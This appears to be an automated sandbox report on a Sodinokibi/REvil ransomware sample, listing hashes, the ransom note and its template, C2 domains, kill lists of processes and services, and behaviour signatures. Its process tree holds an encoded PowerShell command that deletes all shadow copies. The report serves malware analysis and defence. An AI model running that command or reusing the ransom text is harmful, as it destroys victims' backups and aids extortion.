Analysis

  • max time kernel
    132s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:30

General

  • Target

    98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe

  • Size

    205KB

  • MD5

    20ec49de6d2f5b22796b63d960890fbb

  • SHA1

    890b34f3ace317b3b37a9f560aa10578009b650c

  • SHA256

    98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705

  • SHA512

    449218d59e00e34be6e48b44b7dae836331aae905cffd484e501b2ee898866762c6026d649d2c4ed11d8a18bd78af60e7aca80c12b91253a437081afad399942

Malware Config

Extracted

Path

C:\m1mun6-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion m1mun6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/403609DD3FCEECAB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/403609DD3FCEECAB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: NfRRJLBqfXYxRL/bDk3qiD46A9JfzEoeCLU1ZxnPww9BIP6VjmPckfNANf4zwZ9d Aw24vGTU3Pvy3mp65w2jPRP1GgWbIZ+GMJ6eNSQOfGn4McrO3cLV541eN38aqd+H xjYqotwu1FhMO9qB0Wv1MIsV5sMB8yJTj2872+jfx005O/Feh5IeunpsuTD5dx5g +qD4KZfvqn4sVVetpq+kCFoCyGSo7ibMO/znN1kA+ZLi9kVZRQcBeYp0etTVN6zu 8VF8WZSaYJLKamt82O4+JkszLpkbrH8JanTMh/uzZ3ozGv8VU3kQg2CKTybmv91O /VWcXPdF1NhYdVflKREIs1wXWZC9pmUHAkG62PFmVYQeJiqQvobu2Ng4TG++miQu hQoj4lH/Rz7wgxrblFRM8BZWEuMcUPdf5aRqGaTiOI+7PDt+Bs52qzE7y1Rzi+Q5 V49mH7nmiCsMTfkNcYihd1gcdE+HZf+KLEnEX6kgUHV0wbdM/5ZG52isTrrjd7Ez fO097Kwz/GLkP9m52PrzaWndFKcI0UiNRBG8T8AwyUR3+yKuxdyhmXcG9UW+/phy mxlfv791BKFmXZtbQ+vbcFMcZT1ikfHa+i0f/pCzlJ8qGfy3M7ttliIpexML4KYV LZJ/BLC5kyNpuL2MqhX4U0B+4F7hT2i8g4+q2Zba6cNKm28BYrKvgOgCGuYveW0K cbNs38/2UipgFuJXkPjDwN6YmDQm998TBFHUTfLBIyWgh3yl4LkJ/4sAYwsP9bSg 2lObmbmYbb9CUxuvCTsudANsyiQjvyTTOGiFkYueOjMcFAyP/dXmrzlNnF/SX56W jtEpjw0uLXC8TZ6JU8KiI+e2YE0VUaIU62dG8G6qQwpUuu36iaHOmFTec8CnlMNN 334xEVWZME0afBmtP5052xoRjXaY7bSBH4jrUUfFE56AuiAa/Q1dHUzSWmR4Fu3Z K8EXUyJa+fUyELaVamzra9KXsGmR6W7C/j2ZpP24ST5o98v9JIymt+riTXfZhs8X Yfn8lA9GEp3Kv0i8gCgbSlsiaa94KQ4nO/vWtstH8cVevo2Zrf0BLMYDNr7dV9Cy YaGRAnCP4JzTmjmU6NRZ7FOEHEtUvq+SiXhBZQ93o1jpDhmnPvXC7FG8oBXYH91O D8fsaA== Extension name: m1mun6 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/403609DD3FCEECAB

http://decryptor.top/403609DD3FCEECAB

Extracted

Family

sodinokibi

Botnet

19

Campaign

1428

C2

bcabattoirs.org

2020hindsight.info

campinglaforetdetesse.com

alwaysdc.com

amorbellezaysalud.com

business-basic.de

pourlabretagne.bzh

chomiksy.net

ideamode.com

auberives-sur-vareze.fr

fire-space.com

molinum.pt

90nguyentuan.com

ncn.nl

die-immo-agentur.de

michaelfiegel.com

scietech.academy

handyman-silkeborg.dk

adabible.org

harleystreetspineclinic.com

Attributes
  • net

    true

  • pid

    19

  • prc

    mysqld

    mysqld_nt

    mysqld_opt

    steam

    msftesql

    thebat64

    onenote

    sqlagent

    oracle

    mydesktopqos

    ocssd

    thunderbird

    msaccess

    wordpad

    isqlplussvc

    synctime

    sqlwriter

    tbirdconfig

    sqbcoreservice

    ocautoupds

    winword

    ocomm

    mspub

    firefoxconfig

    powerpnt

    sqlservr

    xfssvccon

    visio

    infopath

    excel

    sqlbrowser

    thebat

    agntsvc

    dbsnmp

    encsvc

    dbeng50

    mydesktopservice

    outlook

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    1428

  • svc

    memtas

    mepocs

    sophos

    backup

    svc$

    sql

    vss

    veeam

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi/Revil sample 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe
    "C:\Users\Admin\AppData\Local\Temp\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Local\Temp\3582-490\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1864
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1144
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1800

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    4
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe
      MD5

      8cf4a7cdc02344752f96018d8cdcdf13

      SHA1

      a1bd78567bc768cecd8ac99b0af350b127664e21

      SHA256

      8c7d3cd88fd1caeaeb00f0899decec457fc38dcfa436cf73dd348d3dab1486ae

      SHA512

      a3f5268692c84aba1bb86f264f543e9dc2d690e16599fbb3cac291ee38c7ad2066e8e55fcc8c2e6edc2d02eceb9f6795d2191cf42822157d291763d26f719ffb

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe
      MD5

      8cf4a7cdc02344752f96018d8cdcdf13

      SHA1

      a1bd78567bc768cecd8ac99b0af350b127664e21

      SHA256

      8c7d3cd88fd1caeaeb00f0899decec457fc38dcfa436cf73dd348d3dab1486ae

      SHA512

      a3f5268692c84aba1bb86f264f543e9dc2d690e16599fbb3cac291ee38c7ad2066e8e55fcc8c2e6edc2d02eceb9f6795d2191cf42822157d291763d26f719ffb

    • \Users\Admin\AppData\Local\Temp\3582-490\98fc76f4920bef67830be2d7d9c45fcff4ca47c9003573708c5b1edfe5a1b705.exe
      MD5

      8cf4a7cdc02344752f96018d8cdcdf13

      SHA1

      a1bd78567bc768cecd8ac99b0af350b127664e21

      SHA256

      8c7d3cd88fd1caeaeb00f0899decec457fc38dcfa436cf73dd348d3dab1486ae

      SHA512

      a3f5268692c84aba1bb86f264f543e9dc2d690e16599fbb3cac291ee38c7ad2066e8e55fcc8c2e6edc2d02eceb9f6795d2191cf42822157d291763d26f719ffb

    • memory/1288-54-0x0000000075471000-0x0000000075473000-memory.dmp
      Filesize

      8KB

    • memory/1864-59-0x000007FEFB611000-0x000007FEFB613000-memory.dmp
      Filesize

      8KB

    • memory/1864-61-0x0000000002550000-0x0000000002552000-memory.dmp
      Filesize

      8KB

    • memory/1864-62-0x0000000002552000-0x0000000002554000-memory.dmp
      Filesize

      8KB

    • memory/1864-63-0x0000000002554000-0x0000000002557000-memory.dmp
      Filesize

      12KB

    • memory/1864-60-0x000007FEF26E0000-0x000007FEF323D000-memory.dmp
      Filesize

      11.4MB

    • memory/1864-64-0x000000000255B000-0x000000000257A000-memory.dmp
      Filesize

      124KB